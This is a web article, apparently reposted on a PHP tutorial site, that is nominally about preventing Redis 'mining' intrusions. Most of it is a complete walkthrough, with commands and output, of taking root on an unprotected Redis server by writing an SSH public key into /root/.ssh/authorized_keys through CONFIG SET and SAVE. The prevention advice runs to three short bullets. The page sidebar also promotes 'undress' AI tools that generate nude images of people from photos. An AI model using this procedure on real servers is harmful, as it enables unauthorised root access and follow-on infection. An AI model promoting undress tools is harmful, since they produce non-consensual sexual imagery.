Home Database Redis A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

Jan 11, 2022 pm 06:49 PM
redis Mining prevention

This article will talk about the principles of Redis mining, see how to prevent it, and share prevention techniques. I hope it will be helpful to everyone!

A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

The author has also been attacked by a mining virus, which was very uncomfortable, but in fact, as long as you understand the means of intrusion, it is very easy to prevent it. Today we will demonstrate how to pass Redis performs privilege escalation to obtain the Root user of the remote server. [Related recommendations: Redis Video Tutorial]

1. First we need some prerequisites

  • Condition 1: You First, there must be a Redis, and we must know its port [default 6379];

  • Condition 2: The password of Redis cannot be too complex, or there is no password;

  • Condition 3: The user who starts Redis is preferably a Root user, which will be more destructive;

2. Start making trouble

  • 2.1 Create a pair of secret keys

Generate a pair through ssh-keygen. Of course, you can use the existing ones without any problem.

root@kali:/usr/local/src# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Copy after login

Next, the attack key value is generated through the public key.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Copy after login

The content is as follows

root@kali:/tmp/rediskey# cat foo.txt 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Copy after login

The purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.

  • 2.2 Configure Key to Redis

The operation is as follows:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Copy after login

Log in to Redis to check whether it has been written into Redis.

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Copy after login
  • 2.3 Replace system files through the Redis saving mechanism

Let’s see the following operations

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Copy after login

At this time, we log in remotely Check the effect on the host.

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w
Copy after login

OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.

3. How to prevent

This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections?

Tips for prevention are as follows:

  • Redis should not listen on dangerous IPs. If so, please add firewall control;

  • Redis must increase password restrictions, and it cannot be a weak password;

  • Try not to start Redis as the Root user.

Follow the above three points to prevent Redis mining, no problem

For more programming-related knowledge, please visit:Introduction to Programming! !

The above is the detailed content of A brief analysis of the principles of Redis mining and how to prevent it (skill sharing). For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

How to build the redis cluster mode How to build the redis cluster mode Apr 10, 2025 pm 10:15 PM

Redis cluster mode deploys Redis instances to multiple servers through sharding, improving scalability and availability. The construction steps are as follows: Create odd Redis instances with different ports; Create 3 sentinel instances, monitor Redis instances and failover; configure sentinel configuration files, add monitoring Redis instance information and failover settings; configure Redis instance configuration files, enable cluster mode and specify the cluster information file path; create nodes.conf file, containing information of each Redis instance; start the cluster, execute the create command to create a cluster and specify the number of replicas; log in to the cluster to execute the CLUSTER INFO command to verify the cluster status; make

How to clear redis data How to clear redis data Apr 10, 2025 pm 10:06 PM

How to clear Redis data: Use the FLUSHALL command to clear all key values. Use the FLUSHDB command to clear the key value of the currently selected database. Use SELECT to switch databases, and then use FLUSHDB to clear multiple databases. Use the DEL command to delete a specific key. Use the redis-cli tool to clear the data.

How to read redis queue How to read redis queue Apr 10, 2025 pm 10:12 PM

To read a queue from Redis, you need to get the queue name, read the elements using the LPOP command, and process the empty queue. The specific steps are as follows: Get the queue name: name it with the prefix of "queue:" such as "queue:my-queue". Use the LPOP command: Eject the element from the head of the queue and return its value, such as LPOP queue:my-queue. Processing empty queues: If the queue is empty, LPOP returns nil, and you can check whether the queue exists before reading the element.

How to use the redis command How to use the redis command Apr 10, 2025 pm 08:45 PM

Using the Redis directive requires the following steps: Open the Redis client. Enter the command (verb key value). Provides the required parameters (varies from instruction to instruction). Press Enter to execute the command. Redis returns a response indicating the result of the operation (usually OK or -ERR).

How to use redis lock How to use redis lock Apr 10, 2025 pm 08:39 PM

Using Redis to lock operations requires obtaining the lock through the SETNX command, and then using the EXPIRE command to set the expiration time. The specific steps are: (1) Use the SETNX command to try to set a key-value pair; (2) Use the EXPIRE command to set the expiration time for the lock; (3) Use the DEL command to delete the lock when the lock is no longer needed.

How to configure Lua script execution time in centos redis How to configure Lua script execution time in centos redis Apr 14, 2025 pm 02:12 PM

On CentOS systems, you can limit the execution time of Lua scripts by modifying Redis configuration files or using Redis commands to prevent malicious scripts from consuming too much resources. Method 1: Modify the Redis configuration file and locate the Redis configuration file: The Redis configuration file is usually located in /etc/redis/redis.conf. Edit configuration file: Open the configuration file using a text editor (such as vi or nano): sudovi/etc/redis/redis.conf Set the Lua script execution time limit: Add or modify the following lines in the configuration file to set the maximum execution time of the Lua script (unit: milliseconds)

How to use the redis command line How to use the redis command line Apr 10, 2025 pm 10:18 PM

Use the Redis command line tool (redis-cli) to manage and operate Redis through the following steps: Connect to the server, specify the address and port. Send commands to the server using the command name and parameters. Use the HELP command to view help information for a specific command. Use the QUIT command to exit the command line tool.

How to set the redis expiration policy How to set the redis expiration policy Apr 10, 2025 pm 10:03 PM

There are two types of Redis data expiration strategies: periodic deletion: periodic scan to delete the expired key, which can be set through expired-time-cap-remove-count and expired-time-cap-remove-delay parameters. Lazy Deletion: Check for deletion expired keys only when keys are read or written. They can be set through lazyfree-lazy-eviction, lazyfree-lazy-expire, lazyfree-lazy-user-del parameters.

See all articles